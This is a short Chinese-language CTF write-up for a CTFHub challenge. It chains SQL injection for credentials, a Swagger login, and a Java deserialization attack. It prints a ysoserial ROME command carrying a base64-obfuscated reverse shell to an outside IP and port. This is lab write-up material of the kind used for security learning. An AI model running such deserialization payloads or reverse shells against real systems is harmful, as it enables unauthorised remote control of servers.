题目地址
https://www.ctfhub.com/#/challenge
0x00
下载文件后idea查看,存在地址/common/test/sqlDict

sqlDict中存在sql注入

获取用户名和密码

0x01
代码中发现引入了swagger

登陆swagger

存在登陆接口,根据sql注入得到的用户名和密码进行登录
resp中返回了base64的auth头
将base64的auth头放入/common/user/current接口中的

可以得到用户名
0x02
从rO0AB特征可以看到是java的序列化后的base64编码
构造反弹shell

1 | % java -jar ysoserial-all.jar ROME "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuNDMuMTg4LjE1OC84MDgwIDA+JjE}|{base64,-d}|{bash,-i}" |base64 |
服务器启动监听端口

0x03
获取flag
